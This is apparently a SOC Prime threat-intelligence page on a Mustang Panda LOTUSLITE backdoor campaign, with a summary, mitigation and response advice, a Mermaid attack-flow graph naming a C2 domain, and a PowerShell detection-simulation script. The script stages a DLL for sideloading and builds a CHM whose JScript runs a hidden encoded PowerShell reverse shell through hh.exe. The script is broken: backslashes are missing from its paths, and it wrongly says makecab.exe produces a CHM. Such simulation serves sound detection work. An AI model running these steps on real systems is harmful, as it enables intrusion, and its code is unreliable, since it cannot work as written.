SOC Prime Bias: Critical

22 Apr 2026 18:58
newspaper icon Acronis

Same packet, different magic: Mustang Panda hits India’s banking sector and Korea geopolitics

Author Photo
SOC Prime Team linkedin icon Follow
Same packet, different magic: Mustang Panda hits India’s banking sector and Korea geopolitics
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The Acronis Threat Research Unit uncovered a new LOTUSLITE backdoor variant targeting organizations in India’s banking sector and individuals connected to South Korean diplomatic affairs. The malware is deployed through DLL sideloading, relying on a legitimate Microsoft-signed executable to load a malicious library, then communicating with a dynamic DNS-based command-and-control server over HTTPS. Based on infrastructure patterns and tradecraft overlaps, researchers attributed the activity to Mustang Panda with moderate confidence.

Investigation

Analysts examined a malicious CHM file, a JavaScript-based loader, and a signed Microsoft_DNX.exe binary that sideloaded a DLL carrying the LOTUSLITE payload. Their analysis revealed updates in exported functions, mutex naming conventions, command-line switches, packet magic values, and API resolution methods. The team also linked the operation to earlier Mustang Panda campaigns through reused Dynu-managed domains and associated IP infrastructure.

Mitigation

Defenders should prevent unauthorized DLL loading into trusted Microsoft-signed executables, monitor for the identified mutex patterns and modified command-line arguments, and apply strict controls around dynamic DNS traffic. Security teams should also detect the distinctive packet magic value 0xB2EBCFDF and watch for suspicious HKCU Run key modifications that may indicate persistence.

Response

If this activity is detected, isolate the impacted system immediately, terminate the malicious process, and remove both the sideloaded DLL and the abused executable from disk. Memory should be captured for forensic analysis, exposed credentials should be revoked, and the identified command-and-control domains and IP address should be blocked. A broader hunt should also be performed across the environment for the mutex and registry-based persistence artifacts tied to the campaign.

"graph TB %% Class definitions section classDef action fill:#99ccff classDef file fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef persistence fill:#ccffcc %% Nodes action_initial_access["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/>Malicious Compiled HTML Help (CHM) file sent via email."] class action_initial_access action file_chm["<b>File</b> – <b>Name</b>: Request_for_Support.chm<br/><b>Type</b>: Compiled HTML Help"] class file_chm file action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim opens the CHM, triggering embedded JavaScript."] class action_user_execution action action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>JavaScript drops a Microsoftu2011signed executable and a malicious DLL using ActiveX and hidden HTML."] class action_obfuscation action file_ms_dnx["<b>File</b> – <b>Name</b>: Microsoft_DNX.exe<br/><b>Signature</b>: Microsoft signed"] class file_ms_dnx file file_lotuslite["<b>Malware</b> – <b>Name</b>: LotusLite variant DLL<br/><b>Type</b>: Dynamic Link Library"] class file_lotuslite malware action_embedded_payloads["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>CHM contains JavaScript (music.js) that extracts and runs the DLL and EXE."] class action_embedded_payloads action action_system_binary_proxy["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b><br/>Microsoft_DNX.exe proxies execution of the malicious DLL via LoadLibraryExW."] class action_system_binary_proxy action action_trusted_dev_utilities["<b>Action</b> – <b>T1127 Trusted Developer Utilities Proxy Execution</b><br/>Abuse of Microsoft_DNX.exe, a trusted .NET runtime tool, to run the backdoor."] class action_trusted_dev_utilities action action_script_proxy["<b>Action</b> – <b>T1216 System Script Proxy Execution</b><br/>Embedded JavaScript acts as a script proxy to launch the executable."] class action_script_proxy action action_hijack_execution["<b>Action</b> – <b>T1574.005 Hijack Execution Flow</b><br/>DLL sideloading by placing malicious DLL with the same name in the executableu2019s directory."] class action_hijack_execution action action_persistence["<b>Action</b> – <b>T1547.014 Boot or Logon Autostart Execution</b><br/>Active Setup writes a Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run."] class action_persistence persistence command_and_control["<b>Command and Control</b><br/>Implant contacts dynamicu2011DNS domain editor.gleeze.com over HTTPS."] class command_and_control process %% Connections showing attack flow action_initial_access –>|delivers| file_chm file_chm –>|opened by victim| action_user_execution action_user_execution –>|triggers| action_obfuscation action_obfuscation –>|drops| file_ms_dnx action_obfuscation –>|drops| file_lotuslite file_ms_dnx –>|used in| action_system_binary_proxy file_ms_dnx –>|used in| action_trusted_dev_utilities action_system_binary_proxy –>|loads| file_lotuslite action_trusted_dev_utilities –>|executes| file_lotuslite action_user_execution –>|executes| action_script_proxy action_script_proxy –>|launches| file_ms_dnx action_obfuscation –>|enables| action_embedded_payloads action_embedded_payloads –>|provides| action_hijack_execution action_hijack_execution –>|facilitates| action_persistence action_persistence –>|establishes| command_and_control "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Stage malicious DLL:

      • The attacker copies a malicious DLL (lotuslite.dll) into the same directory as the legitimate Microsoft_DNX.exe. This DLL contains the backdoor payload.

    2. Execute DLL sideloading via Microsoft_DNX.exe:

      • By launching Microsoft_DNX.exe without arguments, Windows loads the malicious DLL first (due to the “search order” hijack), executing the backdoor.

    3. Create malicious CHM:

      • A CHM file (evil.chm) is crafted containing JavaScript that, when rendered, launches a PowerShell reverse shell.

    4. Trigger JavaScript via hh.exe:

      • The attacker runs hh.exe evil.chm, causing the HTML Help executable to parse the CHM and execute the embedded script, achieving code execution under a signed binary.

    This sequence generates two distinct Sysmon Process Create events that match the detection rule’s conditions.

  • Regression Test Script:

    # -------------------------------------------------------------------------
# LotusLite Simulation – DLL sideloading + hh.exe CHM execution
# -------------------------------------------------------------------------
# Prerequisites:
#   - Sysmon installed and forwarding logs.
#   - Administrator privileges (required for writing to Program Files).

$dnxPath = "$env:ProgramFilesMicrosoftMicrosoft_DNX.exe"
$dnxDir  = Split-Path $dnxPath -Parent

# 1. Deploy malicious DLL (simulated payload)
$malDllSource = "C:Templotuslite.dll"      # <-- replace with real payload path
$malDllDest   = Join-Path $dnxDir "lotuslite.dll"
Copy-Item -Path $malDllSource -Destination $malDllDest -Force

# 2. Launch Microsoft_DNX.exe to trigger DLL sideloading
Write-Host "[*] Launching Microsoft_DNX.exe for DLL sideloading..."
Start-Process -FilePath $dnxPath -WindowStyle Hidden

# 3. Create malicious CHM containing JavaScript (simplified example)
$chmPath = "C:Tempevil.chm"
$htmlContent = @"
<HTML><HEAD>
<SCRIPT language=`"JScript`">
var shell = new ActiveXObject("WScript.Shell");
shell.Run("powershell -nop -w hidden -EncodedCommand <base64-rev-shell>", 0);
</SCRIPT>
</HEAD><BODY></BODY></HTML>
"@

$tempHtml = "C:Tempevil.html"
$htmlContent | Out-File -FilePath $tempHtml -Encoding ASCII

# Use makecab to wrap the HTML into a CHM (requires Windows SDK tools)
$makeCab = "$env:WINDIRsystem32makecab.exe"
& $makeCab /D "CompressionType=MSZIP" $tempHtml $chmPath

# 4. Execute the CHM via hh.exe
Write-Host "[*] Launching hh.exe on malicious CHM..."
Start-Process -FilePath "$env:SystemRootSystem32hh.exe" -ArgumentList $chmPath -WindowStyle Hidden

# Cleanup temporary files (retain malicious DLL for post‑run analysis)
Remove-Item $tempHtml -Force
Write-Host "[*] Simulation complete."

  • Cleanup Commands:

    # -------------------------------------------------------------------------
# Cleanup for LotusLite Simulation
# -------------------------------------------------------------------------
$dnxPath = "$env:ProgramFilesMicrosoftMicrosoft_DNX.exe"
$dnxDir  = Split-Path $dnxPath -Parent
$malDllDest = Join-Path $dnxDir "lotuslite.dll"
$chmPath = "C:Tempevil.chm"

# Remove malicious DLL
if (Test-Path $malDllDest) {
    Remove-Item $malDllDest -Force
    Write-Host "[*] Removed malicious DLL."
}

# Remove CHM
if (Test-Path $chmPath) {
    Remove-Item $chmPath -Force
    Write-Host "[*] Removed malicious CHM."
}

# Optionally terminate lingering processes (if any)
Get-Process -Name "Microsoft_DNX","hh" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[*] Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free